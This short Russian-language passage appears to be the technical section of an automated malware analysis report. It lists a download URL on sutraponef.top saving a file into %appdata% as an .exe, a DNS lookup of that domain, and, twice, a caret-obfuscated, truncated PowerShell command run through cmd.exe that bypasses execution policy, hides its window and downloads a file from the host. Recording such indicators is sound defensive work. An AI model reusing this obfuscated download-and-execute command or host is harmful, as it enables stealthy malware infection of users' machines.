Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWE^rshe^Ll.^exE ^-^E^xECUtI^ON^Pol^icY ^b^Y^PaS^S^ -nO^p^rOFilE^ ^-w^indO^WST^Y^l^E ^HI^dD^E^n ^(NEw^-O^bjE^cT ^s^ysTEm.^N^ET.WEbCl^I^ENt)^.d^O^w^n^lO^a^dFI^l^e('http://sutrapon...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "PoWE^rshe^Ll.^exE ^-^E^xECUtI^ON^Pol^icY ^b^Y^PaS^S^ -nO^p^rOFilE^ ^-w^indO^WST^Y^l^E ^HI^dD^E^n ^(NEw^-O^bjE^cT ^s^ysTEm.^N^ET.WEbCl^I^ENt)^.d^O^w^n^lO^a^dFI^l^e('http://sutrapon...' (со скрытым окном)